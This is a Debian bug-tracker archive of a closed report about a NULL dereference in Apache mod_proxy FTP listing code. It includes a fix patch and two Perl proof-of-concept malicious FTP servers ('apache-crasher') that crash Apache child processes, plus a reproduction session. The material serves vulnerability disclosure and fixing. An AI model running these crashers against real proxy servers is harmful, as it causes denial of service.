[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Bug#413727: marked as done (apache2.2-common: mod_proxy_ftp segfaults (NULL deref.) when FTP server sends back no spaces)

Your message dated Sun, 10 Jun 2007 17:47:04 +0000
with message-id <E1HxRVI-0002Ky-KS@ries.debian.org>
and subject line Bug#413727: fixed in apache2 2.2.3-5
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)
--- Begin Message --- 
Subject: apache-common: mod_proxy segfaults (NULL deref.) when FTP server sends back no spaces
Package: apache-common
Version: 1.3.34-4
Severity: important
Tags: patch

Hello,

I have found a NULL dereferencing bug in mod_proxy. If there is a malicious remote
FTP server and someone uses Apache and mod_proxy to connect to that FTP server,
the server can reply to "LIST" with a directory listing showing directories or
ordinary files with no spaces whatsoever in the line. There is a strrchr(3) call
with no check if it returns NULL, and the code afterwards crashes the Apache child
when the server sends back such lines without spaces.

The bug both affects the 1.3.x and 2.x branches of Apache.

I do not see any security implications to this bug, despite the remote crashing, as
it only seems possible to use it to crash the Apache child and not the main process,
no matter what MPM you use.

This was reported to upstream a few months ago:

  o  http://issues.apache.org/bugzilla/show_bug.cgi?id=40733

// Ulf Harnhammar


metaur:~# fgrep ftpspecial /etc/services
ftpspecial      1096/tcp
ftpspecial      1096/udp
metaur:~# tail -n2 /etc/inetd.conf
ftp     stream  tcp     nowait  root  /usr/bin/perl perl /root/apache-crasher.pl
ftpspecial      stream  tcp     nowait  root    /usr/bin/perl perl /root/apache-crasher2.pl
metaur:~# fgrep -A33 'mod_proxy' /etc/apache/httpd.conf
<IfModule mod_proxy.c>
    #
    # Proxy Server directives. Uncomment the following lines to
    # enable the proxy server:
    #
    ProxyRequests On

    <Directory proxy:*>
        Order deny,allow
        Deny from all
        Allow from 127.0.0.1
    </Directory>


    #
    # Enable/disable the handling of HTTP/1.1 "Via:" headers.
    # ("Full" adds the server version; "Block" removes all outgoing Via: headers)
    # Set to one of: Off | On | Full | Block
    #
    #ProxyVia On

    #
    # To enable the cache as well, edit and uncomment the following lines:
    # (no cacheing without CacheRoot)
    #
    #CacheRoot "/var/cache/apache"
    #CacheSize 5
    #CacheGcInterval 4
    #CacheMaxExpire 24
    #CacheLastModifiedFactor 0.1
    #CacheDefaultExpire 1
    #NoCache a_domain.com another_domain.edu joes.garage_sale.com

</IfModule>
metaur:~# nc localhost 80
GET ftp://localhost/ HTTP/1.0

metaur:~# cd /var/log/apache
metaur:/var/log/apache# cat access.log
metaur:/var/log/apache# cat error.log
[Sat Dec 23 00:11:53 2006] [notice] Apache configured -- resuming normal operations
[Sat Dec 23 00:11:53 2006] [notice] Accept mutex: sysvsem (Default: sysvsem)
[Sat Dec 23 00:13:25 2006] [notice] child pid 20656 exit signal Segmentation fault (11)
metaur:/var/log/apache# cd
metaur:~#


-- System Information:
Debian Release: 4.0
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.4.27-3-686
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)

Versions of packages apache-common depends on:
ii  apache2-utils         2.2.3-3.2          utility programs for webservers
ii  debconf [debconf-2.0] 1.5.8              Debian configuration management sy
ii  dillo [www-browser]   0.8.5-4            Small and fast web browser
ii  elinks [www-browser]  0.11.1-1.2         advanced text-mode WWW browser
ii  epiphany-browser [www 2.14.3-3           Intuitive GNOME web browser
ii  firefox [www-browser] 1.5.dfsg+1.5.0.7-2 lightweight web browser based on M
ii  galeon [www-browser]  2.0.2-4            GNOME web browser for advanced use
ii  konqueror [www-browse 4:3.5.5a.dfsg.1-2  KDE's advanced file manager, web b
ii  libc6                 2.3.6.ds1-8        GNU C Library: Shared libraries
ii  libdb4.4              4.4.20-8           Berkeley v4.4 Database Libraries [
ii  libexpat1             1.95.8-3.3         XML parsing C library - runtime li
ii  links2 [www-browser]  2.1pre26-4         Web browser running in both graphi
ii  lynx [www-browser]    2.8.5-2sarge2.2    Text-mode WWW Browser
ii  mime-support          3.39-1             MIME files 'mime.types' & 'mailcap
ii  perl                  5.8.8-6.1          Larry Wall's Practical Extraction 
ii  sed                   4.1.5-1            The GNU sed stream editor
ii  ucf                   2.0017             Update Configuration File: preserv

apache-common recommends no packages.

-- debconf information excluded


--- src/modules/proxy/proxy_ftp.c.old	2006-12-22 23:44:57.000000000 +0100
+++ src/modules/proxy/proxy_ftp.c	2006-12-23 00:23:13.000000000 +0100
@@ -357,33 +357,38 @@ static long int send_dir(BUFF *data, req
             }
 
             filename = strrchr(buf, ' ');
-            *(filename++) = 0;
-
-            /* handle filenames with spaces in 'em */
-            if (!strcmp(filename, ".") || !strcmp(filename, "..") || firstfile) {
-                firstfile = 0;
-                searchidx = filename - buf;
-            }
-            else if (searchidx != 0 && buf[searchidx] != 0) {
-                *(--filename) = ' ';
-                buf[searchidx - 1] = 0;
-                filename = &buf[searchidx];
-            }
-
-            /* Special handling for '.' and '..': append slash to link */
-            if (!strcmp(filename, ".") || !strcmp(filename, "..") || buf[0] == 'd') {
-                ap_snprintf(buf2, buf_size, "%s <a href=\"%s/\">%s</a>\n",
-                         ap_escape_html(p, buf), ap_escape_uri(p, filename),
-                            ap_escape_html(p, filename));
-            }
-            else {
-                ap_snprintf(buf2, buf_size, "%s <a href=\"%s\">%s</a>\n",
-                            ap_escape_html(p, buf),
-                            ap_escape_uri(p, filename),
-                            ap_escape_html(p, filename));
+            if (filename == NULL) {
+                ap_log_rerror(APLOG_MARK, APLOG_ERR, c->req,
+                              "proxy: error parsing %s", buf);
+            } else {
+                *(filename++) = 0;
+
+                /* handle filenames with spaces in 'em */
+                if (!strcmp(filename, ".") || !strcmp(filename, "..") || firstfile) {
+                    firstfile = 0;
+                    searchidx = filename - buf;
+                }
+                else if (searchidx != 0 && buf[searchidx] != 0) {
+                    *(--filename) = ' ';
+                    buf[searchidx - 1] = 0;
+                    filename = &buf[searchidx];
+                }
+
+                /* Special handling for '.' and '..': append slash to link */
+                if (!strcmp(filename, ".") || !strcmp(filename, "..") || buf[0] == 'd') {
+                    ap_snprintf(buf2, buf_size, "%s <a href=\"%s/\">%s</a>\n",
+                             ap_escape_html(p, buf), ap_escape_uri(p, filename),
+                                ap_escape_html(p, filename));
+                }
+                else {
+                    ap_snprintf(buf2, buf_size, "%s <a href=\"%s\">%s</a>\n",
+                                ap_escape_html(p, buf),
+                                ap_escape_uri(p, filename),
+                                ap_escape_html(p, filename));
+                }
+                ap_cpystrn(buf, buf2, buf_size);
+                n = strlen(buf);
             }
-            ap_cpystrn(buf, buf2, buf_size);
-            n = strlen(buf);
         }
         /* else??? What about other OS's output formats? */
         else {

#!/usr/bin/perl --

# apache-crasher.pl
# by Ulf Harnhammar in 2004-2006
# I hereby place this program in the public domain.

use strict;
use Socket;

$main::loggedin = 0;


sub mysend($)
{
  print "$_[0]\015\012";
} # sub mysend($)


sub myreceive($)
{
  my $inp = '';

  $inp = <STDIN>; $inp =~ tr/\015\012\000//d;
  $_[0] = $inp;
} # sub myreceive($)


$main::ipline = `/sbin/ifconfig | egrep '^ *inet addr:' | fgrep -v '127.0.0.1'`;
$main::ipline =~ s|^ *inet addr:||;
$main::ipline =~ s|^([0-9.]+).*$|$1|s;
die "don't know my address\n" unless $main::ipline;
$main::ipline =~ tr/./,/;

$|++;
mysend('220 Welcome to apache crasher 0.1.0 !!');

while (1)
{
  my ($str, $savestr, $reststr) = ('', '', '');

  alarm 5;
  myreceive($str);
  alarm 0;
  $savestr = $str;
  $str =~ s|^([A-Z]+) *(.*)$|$1|;
  $reststr = $2;

  if ($str eq 'USER')
  {
    mysend('331 Anonymous access allowed, send identity (e-mail name) '.
           'as password.');
    $main::loggedin = 1;
    next;
  }

  if (($str eq 'PASS') && ($main::loggedin == 1))
  { mysend('230 Anonymous user logged in.'); $main::loggedin = 2; next; }

  if ($main::loggedin < 2)
  { mysend("500 '$savestr': Command not understood."); next; }

  if ($str eq 'SYST')
  { mysend('215 Windows_NT'); next; }

  if ($str eq 'PWD')
  { mysend('257 "/" is current directory.'); next; }

  if ($str eq 'TYPE')
  { mysend("200 Type set to $reststr."); next; }

  if ($str eq 'PASV')
  {
    mysend("227 Entering Passive Mode ($main::ipline,4,72)"); next;
  }

  if ($str eq 'LIST')
  {
    sleep 2;
    mysend('226 Transfer complete.');
    next;
  }

  if ($str eq 'QUIT')
  {
    mysend('221  Thanks for using apache crasher 0.1.0 !');
    exit 0;
  }

  mysend("500 '$savestr': Command not understood.");
} # while 1


__END__

#!/usr/bin/perl --

# apache-crasher2.pl
# by Ulf Harnhammar in 2006
# I hereby place this program in the public domain.

print '-rwxrwxrwx_______________________'.
      "Apache_Crasher_0.1.0\015\012";

--- End Message ---
--- Begin Message --- 
Source: apache2
Source-Version: 2.2.3-5

We believe that the bug you reported is fixed in the latest version of
apache2, which is due to be installed in the Debian FTP archive:

apache2-doc_2.2.3-5_all.deb
  to pool/main/a/apache2/apache2-doc_2.2.3-5_all.deb
apache2-mpm-event_2.2.3-5_i386.deb
  to pool/main/a/apache2/apache2-mpm-event_2.2.3-5_i386.deb
apache2-mpm-perchild_2.2.3-5_all.deb
  to pool/main/a/apache2/apache2-mpm-perchild_2.2.3-5_all.deb
apache2-mpm-prefork_2.2.3-5_i386.deb
  to pool/main/a/apache2/apache2-mpm-prefork_2.2.3-5_i386.deb
apache2-mpm-worker_2.2.3-5_i386.deb
  to pool/main/a/apache2/apache2-mpm-worker_2.2.3-5_i386.deb
apache2-prefork-dev_2.2.3-5_i386.deb
  to pool/main/a/apache2/apache2-prefork-dev_2.2.3-5_i386.deb
apache2-src_2.2.3-5_all.deb
  to pool/main/a/apache2/apache2-src_2.2.3-5_all.deb
apache2-threaded-dev_2.2.3-5_i386.deb
  to pool/main/a/apache2/apache2-threaded-dev_2.2.3-5_i386.deb
apache2-utils_2.2.3-5_i386.deb
  to pool/main/a/apache2/apache2-utils_2.2.3-5_i386.deb
apache2.2-common_2.2.3-5_i386.deb
  to pool/main/a/apache2/apache2.2-common_2.2.3-5_i386.deb
apache2_2.2.3-5.diff.gz
  to pool/main/a/apache2/apache2_2.2.3-5.diff.gz
apache2_2.2.3-5.dsc
  to pool/main/a/apache2/apache2_2.2.3-5.dsc
apache2_2.2.3-5_all.deb
  to pool/main/a/apache2/apache2_2.2.3-5_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 413727@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Stefan Fritsch <sf@debian.org> (supplier of updated apache2 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Sun, 10 Jun 2007 18:54:29 +0200
Source: apache2
Binary: apache2-utils apache2-prefork-dev apache2 apache2-mpm-prefork apache2-doc apache2-mpm-event apache2.2-common apache2-mpm-worker apache2-src apache2-threaded-dev apache2-mpm-perchild
Architecture: source all i386
Version: 2.2.3-5
Distribution: unstable
Urgency: low
Maintainer: Debian Apache Maintainers <debian-apache@lists.debian.org>
Changed-By: Stefan Fritsch <sf@debian.org>
Description: 
 apache2    - Next generation, scalable, extendable web server
 apache2-doc - documentation for apache2
 apache2-mpm-event - Event driven model for Apache HTTPD
 apache2-mpm-perchild - Transitional package - please remove
 apache2-mpm-prefork - Traditional model for Apache HTTPD
 apache2-mpm-worker - High speed threaded model for Apache HTTPD
 apache2-prefork-dev - development headers for apache2
 apache2-src - Apache source code
 apache2-threaded-dev - development headers for apache2
 apache2-utils - utility programs for webservers
 apache2.2-common - Next generation, scalable, extendable web server
Closes: 312385 322385 390348 391813 396162 397789 399043 400981 401053 403682 407307 412407 412580 412602 413727 416322 418464 419552 420101 422589 423653 428058
Changes: 
 apache2 (2.2.3-5) unstable; urgency=low
 .
   [ Tollef Fog Heen ]
   * Fix up apache2-src so the .tar.gz contains an apache2 top level
     directory.
   * Make apache2 MPMs provide and conflict with apache2-mpm so other
     packages can provide MPMs too.
   * Get rid of 2.1 references from descriptions.  (Closes: #400981)
 .
   [ Thom May ]
   * Let the init script cope with multiple pid files correctly. Probably we
     shouldn't be doing this at all, but we might as well do it properly!
     (Closes: #396162)
   * Add a sensible autoindex default config
   * Add patch from upstream to ensure that mod_cgi 500 responses aren't
     truncated (Closes: #412580)
   * Use graceful-stop to shutdown apache to ensure we cope nicely with long
     running or blocked children
 .
   [ Peter Samuelson ]
   * Ship apache2 manpage in apache2.2-common.  (Closes: #391813)
   * Rearrange init script so that 'force-reload' is the same as 'reload'.
     (Closes: #401053)
   * Add Build-Depends: mawk.  (Closes: #403682)
   * Add a needed <IfModule mod_include.c> guard to apache2.conf.
     (Closes: #407307)
   * Stop shipping /var/run/apache2/ as it is created at runtime anyway.
   * Move the /var/lock/apache2 owner fix from the apache2.2-common
     postinst to the init script, as /var/lock may not persist across
     reboots.  (Closes: #420101)
 .
   [ Stefan Fritsch ]
   * Add Build-Depends: libssl-dev, zlib1g-dev (Closes: #399043)
   * Add XS-Vcs-* to debian/control
   * Improve handling of empty $MODNAME in a2enmod (Closes: #422589)
   * Treat apache2-mpm-itk as prefork in a2enmod (Closes: #412602)
   * Re-add README.Debian and describe
     - the config dir layout (closes: #419552)
     - which files are ignored by Include
     - when and how to change "restart" to "reload" in the logrotate script
   * When purging, remove {mods,sites}-enabled symlinks and the config files
     created by postinst (Closes: #397789)
   * Fix suexec to log after a cgi error (Closes: #312385)
   * Add watch file
   * Add AddType for .bz2 (Closes: #416322)
   * Make init script messages conform better to policy (Closes: #390348)
     and exit with failure if called with unknown parameter (Closes: #412407)
   * Fix segfault in mod_proxy_ftp when FTP server sends back no spaces
     (Closes: #413727)
   * Ship /etc/apache2/conf.d/apache2-doc (Closes: #418464)
   * Tell the user when selecting cgid instead of cgi (Closes: #428058)
   * Add a2ensite/a2dissite man pages (Closes: #322385)
   * Comment out CacheEnable by default, to prevent filling up /var.
     Document the problem in README.Debian and NEWS.Debian, point to
     htcacheclean and give a warning when doing a2enmod disk_cache
     (Closes: #423653).
   * Add myself to Uploaders.
Files: 
 1149f88537f2bd5d6730ea94e2402885 1210 web optional apache2_2.2.3-5.dsc
 08a525f1c25b529d2d6ee56f7e51babc 109573 web optional apache2_2.2.3-5.diff.gz
 43f72963b9b0f3134746d575eafa8c92 955716 web optional apache2.2-common_2.2.3-5_i386.deb
 8f233ee7aa33f2791da01a98330a00ee 432542 web optional apache2-mpm-worker_2.2.3-5_i386.deb
 4a61e26d4ccdcb3ad5ef62a82b90a048 429252 web optional apache2-mpm-prefork_2.2.3-5_i386.deb
 93b53cd35580df62927ed808c94316b2 433286 web optional apache2-mpm-event_2.2.3-5_i386.deb
 1ee52e2ab686315b4a392af467d87f76 341078 web optional apache2-utils_2.2.3-5_i386.deb
 1f257d1af6ac5f6adce0e6ce62072877 407100 devel optional apache2-prefork-dev_2.2.3-5_i386.deb
 fd01d0d5ce29fa237bada7e281117ea5 407712 devel optional apache2-threaded-dev_2.2.3-5_i386.deb
 f91f049265ea00d9f4f443145cfc56b7 273524 web optional apache2-mpm-perchild_2.2.3-5_all.deb
 f7894b465368d77d63aa02a620abb026 40234 web optional apache2_2.2.3-5_all.deb
 c874666076e8fb1a53c57cf78b6c310c 2207048 doc optional apache2-doc_2.2.3-5_all.deb
 c87277222494a759fbf2643f119dc2f5 6614392 devel extra apache2-src_2.2.3-5_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFGbDWabxelr8HyTqQRAtNmAJ9XIFmDqda7rHT4s1u0/L9ebwEYbQCeMIMW
o3Wa75pcKtaw8aRZMk1lV6M=
=UbJd
-----END PGP SIGNATURE-----

--- End Message ---
Reply to: